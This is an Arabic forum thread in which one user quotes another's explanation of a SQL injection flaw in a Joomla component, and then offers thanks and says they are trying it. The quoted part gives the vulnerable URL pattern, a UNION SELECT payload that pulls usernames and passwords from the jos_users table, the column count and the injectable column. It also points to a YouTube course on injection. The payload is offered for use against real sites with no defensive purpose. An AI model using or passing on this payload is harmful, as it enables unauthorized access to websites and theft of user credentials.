 | اقتباس |  | | |  | المشاركة الأصلية كتبت بواسطة Dark Light |  | | | | | | | يقلك ان السكربت مصاب , بثغرة نوع الثغرة "SQL"
مثال ع الثغرة http://[server]/index.php?option...display&artid=
Server = اكتبي الموقع المصاب وسوي مثل الرابط الي فوق
الاستغلال null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users بيـكون : http://www.server.com/index.php?opti...splay&artid=-2 union select 1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8 +from+jos_users
عدد الاعمدة = 8 العمود المصاب = رقم 4 concat(username,0x3a,password)fl0rix أمر يطلع لك باسورد ويوزر القاعدة
ان شاء الله يكون مفهوم ع العموم قلت لك تابعي دورة فولكانو وكلها مرفوعه ع اليوتيوب بتوصلك لاحتراف الحقن ان شاء الله | |  | |  | |
دائما أقف عاجزتا أمام روعة أبداعك
فما تنثره هنا و هناك
يزيدني أعجابا بقلمك و ذائقتك و أنتقاء أحرف كلماتك
يسلموا أيديك ع شرحك الكافي والوافي
جاري التجريب
وجزاك ربي الجنة يا اخي